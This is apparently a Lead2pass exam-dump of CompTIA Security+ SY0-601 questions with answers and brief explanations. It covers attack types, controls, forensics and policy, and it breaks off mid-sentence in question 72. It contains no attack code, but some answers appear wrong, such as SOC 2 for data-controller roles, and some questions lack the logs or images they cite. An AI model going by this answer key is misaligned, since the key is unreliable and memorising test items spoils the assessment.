Copyright © 2006-2011 Lead2pass.com , All Rights Reserved.
Vendor: CompTIA
Exam Code: SY0-601
Exam Name: CompTIA Security+ Certification Exam
Version: 23.101
Important Notice
Product
Our Product Manager keeps an eye for Exam updates by Vendors. Free update is available within
150 days after your purchase.
You can login member center and download the latest product anytime. (Product downloaded
from member center is always the latest.)
PS: Ensure you can pass the exam, please check the latest product in 2-3 days before the exam
again.
Feedback
We devote to promote the product quality and the grade of service to ensure customers interest.
If you have any suggestions, please feel free to contact us at support@lead2pass.com
If you have any questions about our product, please provide Exam Number, Version, Page
Number, Question Number, and your Login Account to us, please contact us at
technology@lead2pass.com and our technical experts will provide support in 24 hours.
Copyright
The product of each order has its own encryption code, so you should use it independently.
If anyone who share the file we will disable the free update and account access.
Any unauthorized changes will be inflicted legal punishment. We will reserve the right of final
explanation for this statement.
Order ID:
****************
PayPal Name: ****************
PayPal ID:
****************
QUESTION 1
An organization is developing an authentication service for use at the entry and exit ports of
country borders. The service will use data feeds obtained from passport systems, passenger
manifests, and high-definition video feeds from CCTV systems that are located at the ports. The
service will incorporate machine-learning techniques to eliminate biometric enrollment processes
while still allowing authorities to identify passengers with increasing accuracy over time. The more
frequently passengers travel, the more accurately the service will identify them.
Which of the following biometrics will MOST likely be used, without the need for enrollment?
(Choose two.)
A.
B.
C.
D.
E.
F.
Voice
Gait
Vein
Facial
Retina
Fingerprint
Answer: BD
QUESTION 2
A small company that does not have security staff wants to improve its security posture. Which of
the following would BEST assist the company?
A.
B.
C.
D.
MSSP
SOAR
IaaS
PaaS
Answer: A
Explanation:
The company doesn't have IT Staff. So if they want security, they need a MSSP (Managed
Security Service Provider).
Managed Security Services Provider (MSSP) - a means of fully outsourcing responsibility for
information assurance to a third party. This type of solution is expensive but can be a good fit for
an SME that has experienced rapid growth and has no in-house security capability. Of course,
this type of outsourcing places a huge amount of trust in the MSSP. Maintaining effective
oversight of the MSSP requires a good degree of internal security awareness and expertise.
There could also be significant challenges in industries exposed to high degrees of regulation in
terms of information processing.
A SOAR (Security Orchestration, Automation, and Response) would improve your security, but
it’s more oriented to the automation of an existing Incident Response plan. If you're thinking of
implement a SOAR you're to likely already have a SOC (Security Operations Center), which it is,
in a way, IT Staff.
QUESTION 3
An organization's help desk is flooded with phone calls from users stating they can no longer
access certain websites. The help desk escalates the issue to the security team, as these
websites were accessible the previous day. The security analysts run the following command:
ipconfig /flushdns, but the issue persists. Finally, an analyst changes the DNS server for an
impacted machine, and the issue goes away. Which of the following attacks MOST likely
occurred on the original DNS server?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
2
A.
B.
C.
D.
DNS cache poisoning
Domain hijacking
Distributed denial-of-service
DNS tunneling
Answer: B
QUESTION 4
A cybersecurity manager has scheduled biannual meetings with the IT team and department
leaders to discuss how they would respond to hypothetical cyberattacks. During these meetings,
the manager presents a scenario and injects additional information throughout the session to
replicate what might occur in a dynamic cybersecurity event involving the company, its facilities,
its data, and its staff. Which of the following describes what the manager is doing?
A.
B.
C.
D.
Developing an incident response plan
Building a disaster recovery plan
Conducting a tabletop exercise
Running a simulation exercise
Answer: C
QUESTION 5
A RAT that was used to compromise an organization's banking credentials was found on a user's
computer. The RAT evaded antivirus detection. It was installed by a user who has local
administrator rights to the system as part of a remote management tool set. Which of the
following recommendations would BEST prevent this from reoccurring?
A.
B.
C.
D.
Create a new acceptable use policy.
Segment the network into trusted and untrusted zones.
Enforce application whitelisting.
Implement DLP at the network boundary.
Answer: C
QUESTION 6
A security analyst is reviewing a new website that will soon be made publicly available. The
analyst sees the following in the URL:
http://dev-site.comptia.org/home/show.php?sessionID=77276554&loc=us
The analyst then sends an internal user a link to the new website for testing purposes, and when
the user clicks the link, the analyst is able to browse the website with the following URL:
http://dev-site.comptia.org/home/show.php?sessionID=98988475&loc=us
Which of the following application attacks is being tested?
A. Pass-the-hash
B. Session replay
C. Object deference
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
3
D. Cross-site request forgery
Answer: D
QUESTION 7
A network administrator has been asked to install an IDS to improve the security posture of an
organization. Which of the following control types is an IDS?
A.
B.
C.
D.
Corrective
Physical
Detective
Administrative
Answer: C
QUESTION 8
Which of the following should be put in place when negotiating with a new vendor about the
timeliness of the response to a significant outage or incident?
A.
B.
C.
D.
MOU
MTTR
SLA
NDA
Answer: C
QUESTION 9
A startup company is using multiple SaaS and IaaS platforms to stand up a corporate
infrastructure and build out a customer-facing web application. Which of the following solutions
would be BEST to provide security, manageability, and visibility into the platforms?
A.
B.
C.
D.
SIEM
DLP
CASB
SWG
Answer: C
Explanation:
A cloud access security broker is on-premises or cloud based software that sits between cloud
service users and cloud applications, and monitors all activity and enforces security policies A
CASB has a separate, and more distinctive role. Differing from the use case for SWG, which
focuses on the broader filtering and protection against inbound threats and filtering illegitimate
web traffic, a CASB is more deeply integrated and has control over your cloud application usage.
It can be tied into an applications API to scan data at rest or can be used with a proxy based
deployment to enforce inline policies for more real time protection.
QUESTION 10
A root cause analysis reveals that a web application outage was caused by one of the company's
developers uploading a newer version of the third-party libraries that were shared among several
applications. Which of the following implementations would be BEST to prevent the issue from
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
4
reoccurring?
A.
B.
C.
D.
CASB
SWG
Containerization
Automated failover
Answer: C
Explanation:
Containerization is defined as a form of operating system virtualization, through which
applications are run in isolated user spaces called containers, all using the same shared
operating system (OS).
QUESTION 11
A security administrator suspects there may be unnecessary services running on a server. Which
of the following tools will the administrator MOST likely use to confirm the suspicions?
A.
B.
C.
D.
Nmap
Wireshark
Autopsy
DNSEnum
Answer: A
Explanation:
Nmap, or Network Mapper, is a network scanning and security auditing tool that is commonly
used to discover and map network resources, such as servers and devices, and to identify the
services running on those resources. It can be used to scan a single host or a range of hosts to
determine which ports are open and which services are running on those ports. This information
can be used to identify services that may be unnecessary or potentially insecure, and to take
appropriate action to mitigate any security risks. In this case, the administrator can use Nmap to
scan the server and confirm whether there are any unnecessary services running on it.
QUESTION 12
A company has drafted an insider-threat policy that prohibits the use of external storage devices.
Which of the following would BEST protect the company from data exfiltration via removable
media?
A.
B.
C.
D.
Monitoring large data transfer transactions in the firewall logs
Developing mandatory training to educate employees about the removable media policy
Implementing a group policy to block user access to system files
Blocking removable-media devices and write capabilities using a host-based security tool
Answer: D
QUESTION 13
In which of the following common use cases would steganography be employed?
A. Obfuscation
B. Integrity
C. Non-repudiation
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
5
D. Blockchain
Answer: A
QUESTION 14
To secure an application after a large data breach, an e-commerce site will be resetting all users'
credentials. Which of the following will BEST ensure the site's users are not compromised after
the reset?
A.
B.
C.
D.
A password reuse policy
Account lockout after three failed attempts
Encrypted credentials in transit
A geofencing policy based on login history
Answer: C
QUESTION 15
In which of the following risk management strategies would cybersecurity insurance be used?
A.
B.
C.
D.
Transference
Avoidance
Acceptance
Mitigation
Answer: A
QUESTION 16
An organization has implemented a policy requiring the use of conductive metal lockboxes for
personal electronic devices outside of a secure research lab. Which of the following did the
organization determine to be the GREATEST risk to intellectual property when creating this
policy?
A.
B.
C.
D.
The theft of portable electronic devices
Geotagging in the metadata of images
Bluesnarfing of mobile devices
Data exfiltration over a mobile hotspot
Answer: D
QUESTION 17
A security analyst is using a recently released security advisory to review historical logs, looking
for the specific activity that was outlined in the advisory. Which of the following is the analyst
doing?
A.
B.
C.
D.
A packet capture
A user behavior analysis
Threat hunting
Credentialed vulnerability scanning
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
6
Answer: C
QUESTION 18
Which of the following would MOST likely support the integrity of a voting machine?
A.
B.
C.
D.
Asymmetric encryption
Blockchain
Transport Layer Security
Perfect forward secrecy
Answer: D
QUESTION 19
A Chief Information Security Officer (CISO) needs to create a policy set that meets international
standards for data privacy and sharing. Which of the following should the CISO read and
understand before writing the policies?
A.
B.
C.
D.
PCI DSS
GDPR
NIST
ISO 31000
Answer: B
QUESTION 20
The IT department at a university is concerned about professors placing servers on the university
network in an attempt to bypass security controls. Which of the following BEST represents this
type of threat?
A.
B.
C.
D.
A script kiddie
Shadow IT
Hacktivism
White-hat
Answer: B
Explanation:
Shadow IT is the use of information technology systems, devices, software, applications, and
services without explicit IT department approval.
QUESTION 21
A commercial cyber-threat intelligence organization observes IoCs across a variety of unrelated
customers. Prior to releasing specific threat intelligence to other paid subscribers, the
organization is MOST likely obligated by contracts to:
A.
B.
C.
D.
perform attribution to specific APTs and nation-state actors.
anonymize any PII that is observed within the IoC data.
add metadata to track the utilization of threat intelligence reports.
assist companies with impact assessments based on the observed data.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
7
Answer: B
QUESTION 22
While checking logs, a security engineer notices a number of end users suddenly downloading
files with the .tar.gz extension. Closer examination of the files reveals they are PE32 files. The
end users state they did not initiate any of the downloads. Further investigation reveals the end
users all clicked on an external email containing an infected MHT file with an href link a week
prior. Which of the following is MOST likely occurring?
A.
B.
C.
D.
A RAT was installed and is transferring additional exploit tools.
The workstations are beaconing to a command-and-control server.
A logic bomb was executed and is responsible for the data transfers.
A fireless virus is spreading in the local network environment.
Answer: A
Explanation:
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are
sent to the target as an email attachment. Once the attacker compromises the host's system,
they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
QUESTION 23
An organization is developing a plan in the event of a complete loss of critical systems and data.
Which of the following plans is the organization MOST likely developing?
A.
B.
C.
D.
Incident response
Communications
Disaster recovery
Data retention
Answer: C
QUESTION 24
Which of the following is the purpose of a risk register?
A.
B.
C.
D.
To define the level or risk using probability and likelihood
To register the risk with the required regulatory agencies
To identify the risk, the risk owner, and the risk measures
To formally log the type of risk mitigation strategy the organization is using
Answer: C
Explanation:
The Risk Register displays a list of all risks recorded and displays various risk details, including
the residual risk level, risk source, risk owner, risk stage, and the treatment status of the risk.
The question ask for purpose. So C is the purpose, while A is only part of the risk register work.
QUESTION 25
A university with remote campuses, which all use different service providers, loses Internet
connectivity across all locations. After a few minutes, Internet and VoIP services are restored,
only to go offline again at random intervals, typically within four minutes of services being
restored. Outages continue throughout the day, impacting all inbound and outbound connections
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
8
and services. Services that are limited to the local LAN or WiFi network are not impacted, but all
WAN and VoIP services are affected.
Later that day, the edge-router manufacturer releases a CVE outlining the ability of an attacker to
exploit the SIP protocol handling on devices, leading to resource exhaustion and system reloads.
Which of the following BEST describe this type of attack? (Choose two.)
A.
B.
C.
D.
E.
F.
DoS
SSL stripping
Memory leak
Race condition
Shimming
Refactoring
Answer: AD
QUESTION 26
A company recently set up an e-commerce portal to sell its product online. The company wants to
start accepting credit cards for payment, which requires compliance with a security standard.
Which of the following standards must the company comply with before accepting credit cards on
its e-commerce platform?
A.
B.
C.
D.
PCI DSS
ISO 22301
ISO 27001
NIST CSF
Answer: A
Explanation:
Additionally, many organizations should abide by certain standards. For example, organizations
handling credit card information need to comply with the Payment Card Industry Data Security
Standard (PCI DSS). PCI DSS includes six control objectives and 12 specific requirements that
help prevent fraud.
QUESTION 27
Which of the following BEST describes a security exploit for which a vendor patch is not readily
available?
A.
B.
C.
D.
Integer overflow
Zero-day
End of life
Race condition
Answer: B
QUESTION 28
The Chief Financial Officer (CFO) of an insurance company received an email from Ann, the
company's Chief Executive Officer (CEO), requesting a transfer of $10,000 to an account. The
email states Ann is on vacation and has lost her purse, containing cash and credit cards. Which
of the following social- engineering techniques is the attacker using?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
9
A.
B.
C.
D.
Phishing
Whaling
Typo squatting
Pharming
Answer: B
QUESTION 29
An organization wants to implement a third factor to an existing multifactor authentication. The
organization already uses a smart card and password. Which of the following would meet the
organization's needs for a third factor?
A.
B.
C.
D.
Date of birth
Fingerprints
PIN
TPM
Answer: B
QUESTION 30
An employee has been charged with fraud and is suspected of using corporate assets. As
authorities collect evidence, and to preserve the admissibility of the evidence, which of the
following forensic techniques should be used?
A.
B.
C.
D.
Order of volatility
Data recovery
Chain of custody
Non-repudiation
Answer: C
QUESTION 31
A company wants to deploy PKI on its Internet-facing website. The applications that are currently
deployed are:
- www.company.com (main website)
- contactus.company.com (for locating a nearby location)
- quotes.company.com (for requesting a price quote)
The company wants to purchase one SSL certificate that will work for all the existing applications
and any future applications that follow the same naming conventions, such as
store.company.com. Which of the following certificate types would BEST meet the requirements?
A.
B.
C.
D.
SAN
Wildcard
Extended validation
Self-signed
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
10
QUESTION 32
A Chief Security Officer (CSO) is concerned about the amount of PII that is stored locally on each
salesperson's laptop. The sales department has a higher-than-average rate of lost equipment.
Which of the following recommendations would BEST address the CSO's concern?
A.
B.
C.
D.
Deploy an MDM solution.
Implement managed FDE.
Replace all hard drives with SEDs.
Install DLP agents on each laptop.
Answer: B
QUESTION 33
A user contacts the help desk to report the following:
- Two days ago, a pop-up browser window prompted the user for a name
and password after connecting to the corporate wireless SSID. This had
never happened before, but the user entered the information as
requested.
- The user was able to access the Internet but had trouble accessing
the department share until the next day.
- The user is now getting notifications from the bank about
unauthorized transactions.
Which of the following attack vectors was MOST likely used in this scenario?
A.
B.
C.
D.
Rogue access point
Evil twin
DNS poisoning
ARP poisoning
Answer: B
QUESTION 34
A host was infected with malware. During the incident response, Joe, a user, reported that he did
not receive any emails with links, but he had been browsing the Internet all day. Which of the
following would MOST likely show where the malware originated?
A.
B.
C.
D.
The DNS logs
The web server logs
The SIP traffic logs
The SNMP logs
Answer: A
Explanation:
Why is DNS Monitoring Important? An effective system of DNS monitoring is critical to the
reliability of your website, as well as the security and trust of your users. Because the DNS is a
popular target for hackers, it's important to keep a close eye for any malicious attacks on your
domains and services.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
11
QUESTION 35
A recently discovered zero-day exploit utilizes an unknown vulnerability in the SMB network
protocol to rapidly infect computers. Once infected, computers are encrypted and held for
ransom. Which of the following would BEST prevent this attack from reoccurring?
A.
B.
C.
D.
Configure the perimeter firewall to deny inbound external connections to SMB ports.
Ensure endpoint detection and response systems are alerting on suspicious SMB connections.
Deny unauthenticated users access to shared network folders.
Verify computers are set to install monthly operating system, updates automatically.
Answer: A
QUESTION 36
Joe, an employee, receives an email stating he won the lottery. The email includes a link that
requests a name, mobile phone number, address, and date of birth be provided to confirm Joe's
identity before sending him the prize. Which of the following BEST describes this type of email?
A.
B.
C.
D.
Spear phishing
Whaling
Phishing
Vishing
Answer: C
Explanation:
"The email includes a link that requests a name, mobile phone number, address, and date of
birth" its way to vague for it to be spear phishing.
If it was a spear phishing, then the attacker should already know his name and Joe just need to
fill out mobile phone number, address, and date of birth.
QUESTION 37
Which of the following refers to applications and systems that are used within an organization
without consent or approval?
A.
B.
C.
D.
Shadow IT
OSINT
Dark web
Insider threats
Answer: A
QUESTION 38
A manufacturer creates designs for very high security products that are required to be protected
and controlled by the government regulations. These designs are not accessible by corporate
networks or the Internet. Which of the following is the BEST solution to protect these designs?
A.
B.
C.
D.
An air gap
A Faraday cage
A shielded cable
A demilitarized zone
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
12
Answer: A
QUESTION 39
A company processes highly sensitive data and senior management wants to protect the
sensitive data by utilizing classification labels. Which of the following access control schemes
would be BEST for the company to implement?
A.
B.
C.
D.
Discretionary
Rule-based
Role-based
Mandatory
Answer: D
QUESTION 40
Which of the following policies would help an organization identify and mitigate potential single
points of failure in the company's IT/security operations?
A.
B.
C.
D.
Least privilege
Awareness training
Separation of duties
Mandatory vacation
Answer: C
QUESTION 41
Which of the following would be the BEST method for creating a detailed diagram of wireless
access points and hotspots?
A.
B.
C.
D.
Footprinting
White-box testing
A drone/UAV
Pivoting
Answer: A
QUESTION 42
SIMULATION
A company recently added a DR site and is redesigning the network. Users at the DR site are
having issues browsing websites.
INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
13
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
14
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
15
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
16
Answer:
Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
17
Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY
Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
QUESTION 43
Drag and Drop Question
A security engineer is setting up passwordless authentication for the first time.
INSTRUCTIONS
Use the minimum set of commands to set this up and verify that it works. Commands cannot be
reused.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
18
Explanation:
1. ssh-keygen -t rsa (creating the key-pair)
2. ssh-copy-id -i /.ssh/id_rsa.pub user@server (copy the public-key to user@server)
3. ssh -i ~/.ssh/id_rsa user@server (login to remote host with private-key)
QUESTION 44
Hotspot Question
Select the appropriate attack and remediation from each drop-down list to label the corresponding
attack with its remediation.
INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
19
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
20
QUESTION 45
Which of the following will MOST likely adversely impact the operations of unpatched traditional
programmable-logic controllers, running a back-end LAMP server and OT systems with humanmanagement interfaces that are accessible over the Internet via a web interface? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
21
A.
B.
C.
D.
E.
F.
Cross-site scripting
Data exfiltration
Poor system logging
Weak encryption
SQL injection
Server-side request forgery
Answer: DF
QUESTION 46
A company recently transitioned to a strictly BYOD culture due to the cost of replacing lost or
damaged corporate-owned mobile devices. Which of the following technologies would be BEST
to balance the BYOD culture while also protecting the company's data?
A.
B.
C.
D.
Containerization
Geofencing
Full-disk encryption
Remote wipe
Answer: A
Explanation:
You cannot run a Full Disk Encryption on a Staff's Device. Rather you place the official
application in a container.
QUESTION 47
A Chief Security Office's (CSO's) key priorities are to improve preparation, response, and
recovery practices to minimize system downtime and enhance organizational resilience to
ransomware attacks. Which of the following would BEST meet the CSO's objectives?
A. Use email-filtering software and centralized account management, patch high-risk systems, and
restrict administration privileges on fileshares.
B. Purchase cyber insurance from a reputable provider to reduce expenses during an incident.
C. Invest in end-user awareness training to change the long-term culture and behavior of staff and
executives, reducing the organization's susceptibility to phishing attacks.
D. Implement application whitelisting and centralized event-log management, and perform regular
testing and validation of full backups.
Answer: D
QUESTION 48
A network engineer has been asked to investigate why several wireless barcode scanners and
wireless computers in a warehouse have intermittent connectivity to the shipping server. The
barcode scanners and computers are all on forklift trucks and move around the warehouse during
their regular use. Which of the following should the engineer do to determine the issue? (Choose
two.)
A. Perform a site survey
B. Deploy an FTK Imager
C. Create a heat map
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
22
D. Scan for rogue access points
E. Upgrade the security protocols
F. Install a captive portal
Answer: AC
QUESTION 49
A security administrator suspects an employee has been emailing proprietary information to a
competitor. Company policy requires the administrator to capture an exact copy of the
employee's hard disk. Which of the following should the administrator use?
A.
B.
C.
D.
dd
chmod
dnsenum
logger
Answer: A
QUESTION 50
Which of the following is MOST likely to outline the roles and responsibilities of data controllers
and data processors?
A.
B.
C.
D.
SSAE SOC 2
PCI DSS
GDPR
ISO 31000
Answer: A
Explanation:
Statement on Standards for Attestation Engagements. This AICPA-developed auditing report
assesses how well organizations handle data security, system privacy, data confidentiality and
data processing processes.
QUESTION 51
Phishing and spear-phishing attacks have been occurring more frequently against a company's
staff. Which of the following would MOST likely help mitigate this issue?
A.
B.
C.
D.
DNSSEC and DMARC
DNS query logging
Exact mail exchanger records in the DNS
The addition of DNS conditional forwarders
Answer: C
QUESTION 52
On which of the following is the live acquisition of data for forensic analysis MOST dependent?
(Choose two.)
A. Data accessibility
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
23
B.
C.
D.
E.
F.
Legal hold
Cryptographic or hash algorithm
Data retention legislation
Value and volatility of data
Right-to-audit clauses
Answer: EF
QUESTION 53
Which of the following incident response steps involves actions to protect critical systems while
maintaining business operations?
A.
B.
C.
D.
Investigation
Containment
Recovery
Lessons learned
Answer: B
QUESTION 54
A security auditor is reviewing vulnerability scan data provided by an internal security team.
Which of the following BEST indicates that valid credentials were used?
A.
B.
C.
D.
The scan results show open ports, protocols, and services exposed on the target host
The scan enumerated software versions of installed programs
The scan produced a list of vulnerabilities on the target host
The scan identified expired SSL certificates
Answer: B
QUESTION 55
Which of the following BEST explains the difference between a data owner and a data custodian?
A. The data owner is responsible for adhering to the rules for using the data, while the data
custodian is responsible for determining the corporate governance regarding the data
B. The data owner is responsible for determining how the data may be used, while the data
custodian is responsible for implementing the protection to the data
C. The data owner is responsible for controlling the data, while the data custodian is responsible for
maintaining the chain of custody when handling the data
D. The data owner grants the technical permissions for data access, while the data custodian
maintains the database access controls to the data
Answer: B
QUESTION 56
A network engineer needs to build a solution that will allow guests at the company's headquarters
to access the Internet via WiFi. This solution should not allow access to the internal corporate
network, but it should require guests to sign off on the acceptable use policy before accessing the
Internet. Which of the following should the engineer employ to meet these requirements?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
24
A.
B.
C.
D.
Implement open PSK on the APs
Deploy a WAF
Configure WIPS on the APs
Install a captive portal
Answer: D
QUESTION 57
An organization with a low tolerance for user inconvenience wants to protect laptop hard drives
against loss or data theft. Which of the following would be the MOST acceptable?
A.
B.
C.
D.
SED
HSM
DLP
TPM
Answer: A
Explanation:
SED (self-encrypting drive) would be the most acceptable option for an organization with a low
tolerance for user inconvenience that wants to protect laptop hard drives against loss or data
theft. SEDs are hardware-based encryption devices that automatically encrypt data on a hard
drive without requiring any additional input or configuration from the user. This means that the
user does not have to perform any additional steps to encrypt their data, which can help to
prevent data loss or theft. By contrast, other options like HSM (hardware security module), DLP
(data loss prevention), and TPM (trusted platform module) may require more user involvement
and may not be as convenient for users.
QUESTION 58
A security analyst receives a SIEM alert that someone logged in to the appadmin test account,
which is only used for the early detection of attacks. The security analyst then reviews the
following application log:
Which of the following can the security analyst conclude?
A. A replay attack is being conducted against the application.
B. An injection attack is being conducted against a user authentication system.
C. A service account password may have been changed, resulting in continuous failed logins within
the application.
D. A credentialed vulnerability scanner attack is testing several CVEs against the application.
Answer: B
QUESTION 59
In which of the following situations would it be BEST to use a detective control type for mitigation?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
25
A. A company implemented a network load balancer to ensure 99.999% availability of its web
application.
B. A company designed a backup solution to increase the chances of restoring services in case of a
natural disaster.
C. A company purchased an application-level firewall to isolate traffic between the accounting
department and the information technology department.
D. A company purchased an IPS system, but after reviewing the requirements, the appliance was
supposed to monitor, not block, any traffic.
E. A company purchased liability insurance for flood protection on all capital assets.
Answer: D
QUESTION 60
The IT department's on-site developer has been with the team for many years. Each time an
application is released, the security team is able to identify multiple vulnerabilities. Which of the
following would BEST help the team ensure the application is ready to be released to production?
A.
B.
C.
D.
Limit the use of third-party libraries.
Prevent data exposure queries.
Obfuscate the source code.
Submit the application to QA before releasing it.
Answer: D
QUESTION 61
A cybersecurity analyst needs to implement secure authentication to third-party websites without
users' passwords. Which of the following would be the BEST way to achieve this objective?
A.
B.
C.
D.
OAuth
SSO
SAML
PAP
Answer: C
QUESTION 62
An analyst needs to identify the applications a user was running and the files that were open
before the user's computer was shut off by holding down the power button.
Which of the following would MOST likely contain that information?
A.
B.
C.
D.
NGFW
Pagefile
NetFlow
RAM
Answer: B
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
26
In Digital Forensics, sometimes an investigator will literally pull the plug out of the wall to cause a
hard shutdown and then access the drive for the pagefile because if you shut the PC down
normally, the pagefile is cleared.
https://www.iosrjournals.org/iosr-jce/papers/Vol16-issue2/Version-5/C016251116.pdf
QUESTION 63
A remote user recently took a two-week vacation abroad and brought along a corporate-owned
laptop. Upon returning to work, the user has been unable to connect the laptop to the VPN.
Which of the following is the MOST likely reason for the user's inability to connect the laptop to
the VPN?
A.
B.
C.
D.
Due to foreign travel, the user's laptop was isolated from the network.
The user's laptop was quarantined because it missed the latest path update.
The VPN client was blacklisted.
The user's account was put on a legal hold.
Answer: A
QUESTION 64
An organization needs to implement more stringent controls over administrator/root credentials
and service accounts. Requirements for the project include:
-
Check-in/checkout of credentials
The ability to use but not know the password
Automated password changes
Logging of access to credentials
Which of the following solutions would meet the requirements?
A.
B.
C.
D.
OAuth 2.0
Secure Enclave
A privileged access management system
An OpenID Connect authentication system
Answer: C
QUESTION 65
Several employees return to work the day after attending an industry trade show. That same day,
the security manager notices several malware alerts coming from each of the employee's
workstations. The security manager investigates but finds no signs of an attack on the perimeter
firewall or the NIDS. Which of the following is MOST likely causing the malware alerts?
A.
B.
C.
D.
A worm that has propagated itself across the intranet, which was initiated by presentation media
A fileless virus that is contained on a vCard that is attempting to execute an attack
A Trojan that has passed through and executed malicious code on the hosts
A USB flash drive that is trying to run malicious code but is being blocked by the host firewall
Answer: A
QUESTION 66
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
27
After reading a security bulletin, a network security manager is concerned that a malicious actor
may have breached the network using the same software flaw. The exploit code is publicly
available and has been reported as being used against other industries in the same vertical.
Which of the following should the network security manager consult FIRST to determine a priority
list for forensic review?
A.
B.
C.
D.
The vulnerability scan output
The IDS logs
The full packet capture data
The SIEM alerts
Answer: A
QUESTION 67
A financial organization has adopted a new secure, encrypted document-sharing application to
help with its customer loan process. Some important PII needs to be shared across this new
platform, but it is getting blocked by the DLP systems. Which of the following actions will BEST
allow the PII to be shared with the secure application without compromising the organization's
security posture?
A.
B.
C.
D.
E.
Configure the DLP policies to allow all PII
Configure the firewall to allow all ports that are used by this application
Configure the antivirus software to allow the application
Configure the DLP policies to whitelist this application with the specific PII
Configure the application to encrypt the PII
Answer: D
QUESTION 68
An auditor is performing an assessment of a security appliance with an embedded OS that was
vulnerable during the last two assessments. Which of the following BEST explains the appliance's
vulnerable state?
A.
B.
C.
D.
The system was configured with weak default security settings.
The device uses weak encryption ciphers.
The vendor has not supplied a patch for the appliance.
The appliance requires administrative credentials for the assessment.
Answer: C
QUESTION 69
A company’s bank has reported that multiple corporate credit cards have been stolen over the
past several weeks. The bank has provided the names of the affected cardholders to the
company’s forensics team to assist in the cyber-incident investigation.
An incident responder learns the following information:
- The timeline of stolen card numbers corresponds closely with affected
users making Internet-based purchases from diverse websites via
enterprise desktop PCs.
- All purchase connections were encrypted, and the company uses an SSL
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
28
inspection proxy for the inspection of encrypted traffic of the
hardwired network.
- Purchases made with corporate cards over the corporate guest WiFi
network, where no SSL inspection occurs, were unaffected.
Which of the following is the MOST likely root cause?
A.
B.
C.
D.
HTTPS sessions are being downgraded to insecure cipher suites
The SSL inspection proxy is feeding events to a compromised SIEM
The payment providers are insecurely processing credit card charges
The adversary has not yet established a presence on the guest WiFi network
Answer: B
QUESTION 70
A security analyst has been asked to investigate a situation after the SOC started to receive
alerts from the SIEM. The analyst first looks at the domain controller and finds the following
events:
To better understand what is going on, the analyst runs a command and receives the following
output:
Based on the analyst’s findings, which of the following attacks is being executed?
A.
B.
C.
D.
Credential harvesting
Keylogger
Brute-force
Spraying
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
29
Explanation:
Password spraying is a type of brute force attack. In this attack, an attacker will brute force logins
based on list of usernames with default passwords on the application.
QUESTION 71
Which of the following cloud models provides clients with servers, storage, and networks but
nothing else?
A.
B.
C.
D.
SaaS
PaaS
IaaS
DaaS
Answer: C
QUESTION 72
A network administrator needs to build out a new datacenter, with a focus on resiliency and
uptime. Which of the following would BEST meet this objective? (Choose two.)
A.
B.
C.
D.
E.
F.
Dual power supply
Off-site backups
Automatic OS upgrades
NIC teaming
Scheduled penetration testing
Network-attached storage
Answer: AB
Explanation:
Dual power supply ensures that the datacenter will not lose power if one power supply fails. This
